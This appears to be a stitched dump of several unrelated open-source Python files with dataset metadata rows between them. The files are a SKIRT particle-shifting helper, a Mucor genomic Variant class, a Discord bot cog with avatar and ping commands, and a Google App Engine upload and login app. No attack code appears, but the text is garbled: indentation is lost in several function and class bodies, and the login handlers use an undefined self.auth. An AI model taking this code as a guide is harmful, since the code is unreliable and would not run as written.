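    ms, ts, idxs, mdiffs = stochResamp(np.array([1., 2.]), m_gas)
    assert mdiffs.size == 2 and ms.size == ts.size == idxs.size
    assert np.all(mdiffs <= m_gas * (1. + 1e-9))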
# -----------------------------------------------------------------
## This private helper function randomly shifts the positions of HII region sub-particles
# within the smoothing sphere of their parent.
#
# Arguments:
# - r: parent positions; updated by this function to the shifted positions
# - h: the smoothing lengths of the parents
# - h_mapp: the smoothing lengths of the sub-particles
#
def stochShiftPos(r, h, h_mapp):
# the offset sampling smoothing length is determined so that in the limit of infinite particles,
# the light distribution is the same as the parent particle kernel;
# assuming Gaussian kernels this means h_sampling**2 + h_mapp**2 = h**2.
h_sampling = np.sqrt(np.maximum(0,h*h - h_mapp*h_mapp))
# sample the offset from a scaled gaussian that resembles a cubic spline kernel
# (see the documentation of the SPHDustDistribution class in SKIRT)
r[:,0] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape)
r[:,1] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape)
r[:,2] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape)
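# Illustrative sketch (hypothetical values): with h = 100 and h_mapp = 60 the sampling length is
# sqrt(100^2 - 60^2) = 80, so the per-axis offsets should have a standard deviation of ~0.29*80.
def _demo_stochShiftPos():
    import numpy as np
    np.random.seed(0)
    r = np.zeros((10000, 3))
    stochShiftPos(r, np.full(10000, 100.), np.full(10000, 60.))   # shifts r in place
    assert abs(r[:, 0].std() - 0.29 * 80.) < 1.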
# -----------------------------------------------------------------
| agpl-3.0 | 7,663,827,819,299,570,000 | 47.719407 | 167 | 0.605166 | false | 3.252517 | false | false | false |
blachlylab/mucor | variant.py | 1 | 1480 | # Copyright 2013-2015 James S Blachly, MD and The Ohio State University
#
# This file is part of Mucor.
#
# Mucor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mucor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mucor. If not, see <http://www.gnu.org/licenses/>.
# variant.py
from __future__ import print_function
class Variant:
'''Data about SNV and Indels'''
    def __init__(self, source, sample, pos, ref, alt, frac, dp, eff, fc):
self.source = source # source of variant - typically a filename
self.sample = sample # sample ID, as defined in the VCF
self.pos = pos # HTSeq.GenomicPosition
self.ref = ref
self.alt = alt
self.frac = frac
self.dp = dp
self.eff = eff
self.fc = fc
def __str__(self):
out = ""
for k,v in {'source':self.source, 'sample':self.sample, 'pos':self.pos, 'ref':self.ref, 'alt':self.alt, 'frac':self.frac, 'dp':self.dp, 'eff':self.eff, 'fc':self.fc}.items():
out += k + ":\t" + str(v) + "\n"
return out.strip()
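# Illustrative sketch (hypothetical values; pos is normally an HTSeq.GenomicPosition, stubbed
# here with a plain string): constructing a Variant and printing its fields.
def _demo_variant():
    v = Variant(source='sample1.vcf', sample='S1', pos='chr1:12345', ref='A', alt='T',
                frac=0.42, dp=150, eff='missense_variant', fc='MODERATE')
    print(v)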
| gpl-3.0 | -2,474,534,786,272,326,000 | 37.947368 | 176 | 0.666892 | false | 3.162393 | false | false | false |
BeatButton/beattie | cogs/default.py | 2 | 2318 | from io import BytesIO
import discord
from discord import File, Member
from discord.ext import commands
from discord.ext.commands import Cog
from bot import BeattieBot
from context import BContext
class Default(Cog):
"""Default useful commands."""
@commands.command()
async def avatar(self, ctx: BContext, *, user: Member = None) -> None:
target: discord.abc.User
if user is None:
target = ctx.author
else:
target = user
img = BytesIO()
avatar = target.avatar_url_as(
format="gif" if target.is_avatar_animated() else "png"
)
await avatar.save(img)
filename = str(avatar).rpartition("/")[2].partition("?")[0]
await ctx.send(file=File(img, filename))
@avatar.error
async def avatar_error(self, ctx: BContext, exc: Exception) -> None:
if isinstance(exc, commands.BadArgument):
await ctx.send("User not found.")
else:
await ctx.bot.handle_error(ctx, exc)
@commands.command()
async def latency(self, ctx: BContext) -> None:
"""Get the latency to the websocket."""
await ctx.send(f"WS latency: **{ctx.bot.latency*1000:.0f}ms**")
@commands.command()
async def ping(self, ctx: BContext) -> None:
"""Get how fast the bot reacts to a command message"""
msg = await ctx.send("...")
delta = msg.created_at - ctx.message.created_at
await msg.edit(content=f":ping_pong: **{delta.total_seconds()*1000:.0f}ms**")
msg = await ctx.channel.fetch_message(msg.id)
edited_at = msg.edited_at
assert edited_at is not None
delta2 = edited_at - ctx.message.created_at
await msg.edit(
content=f"{msg.content}\n**{delta2.total_seconds()*1000:.0f}ms**"
)
@commands.command()
async def source(self, ctx: BContext) -> None:
"""Get the source for the bot."""
await ctx.send("https://github.com/BeatButton/beattie")
@commands.command()
async def invite(self, ctx: BContext) -> None:
"""Get the invite for the bot."""
url = "<https://discordapp.com/oauth2/authorize?client_id={}&scope=bot>"
await ctx.send(url.format(ctx.me.id))
def setup(bot: BeattieBot) -> None:
bot.add_cog(Default())
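# Illustrative note (not part of the original cog): with discord.py's extension system this
# module is typically loaded via bot.load_extension("cogs.default"), which invokes setup() above.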
| mit | 623,262,135,659,280,500 | 32.594203 | 85 | 0.609577 | false | 3.638932 | false | false | false |
shashanksingh/android_video_streamer | mineral-hangar-418/main.py | 1 | 2978 | import os
import urllib
import webapp2
import webapp2_extras.appengine.auth.models
from webapp2_extras import security
from webapp2_extras.appengine.auth.models import User
from webapp2_extras.auth import InvalidAuthIdError, InvalidPasswordError
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
class MainHandler(webapp2.RequestHandler):
def get(self):
upload_url = blobstore.create_upload_url('/upload')
self.response.out.write('<html><body>')
self.response.out.write('<form action="%s" method="POST" enctype="multipart/form-data">' % upload_url)
self.response.out.write("""Upload File: <input type="file" name="file"><br> <input type="submit"
name="submit" value="Submit"> </form></body></html>""")
class UploadHandler(blobstore_handlers.BlobstoreUploadHandler):
def post(self):
upload_files = self.get_uploads('file') # 'file' is file upload field in the form
blob_info = upload_files[0]
self.redirect('/serve/%s' % blob_info.key())
class ServeHandler(blobstore_handlers.BlobstoreDownloadHandler):
def get(self, resource):
resource = str(urllib.unquote(resource))
blob_info = blobstore.BlobInfo.get(resource)
self.send_blob(blob_info)
class LoginHandler(webapp2.RequestHandler):
def post(self):
"""
username: Get the username from POST dict
password: Get the password from POST dict
"""
username = self.request.POST.get('username')
password = self.request.POST.get('password')
# Try to login user with password
# Raises InvalidAuthIdError if user is not found
# Raises InvalidPasswordError if provided password doesn't match with specified user
try:
self.auth.get_user_by_password(username, password)
except (InvalidAuthIdError, InvalidPasswordError), e:
# Returns error message to self.response.write in the BaseHandler.dispatcher
# Currently no message is attached to the exceptions
return e
class SignupHandler(webapp2.RequestHandler):
def post(self):
"""
username: Get the username from POST dict
password: Get the password from POST dict
"""
username = self.request.POST.get('username')
password = self.request.POST.get('password')
        # Try to create a new user with the given password;
        # any auth errors are returned to the client via the BaseHandler dispatcher
try:
self.auth.create_user_by_password(username, password)
except (InvalidAuthIdError, InvalidPasswordError), e:
# Returns error message to self.response.write in the BaseHandler.dispatcher
# Currently no message is attached to the exceptions
return e
app = webapp2.WSGIApplication([('/', MainHandler),
('/upload', UploadHandler),
('/serve/([^/]+)?', ServeHandler),
('/signup',SignupHandler),
('/login',LoginHandler)],
debug=True)
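# Illustrative sketch (assumed deployment config, not part of this file): on the App Engine
# Python 2.7 runtime this WSGI app would be exposed through app.yaml, for example:
#
#   handlers:
#   - url: /.*
#     script: main.app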
| gpl-3.0 | -323,633,904,016,594,000 | 39.794521 | 106 | 0.684352 | false | 4.176718 | false | false | false |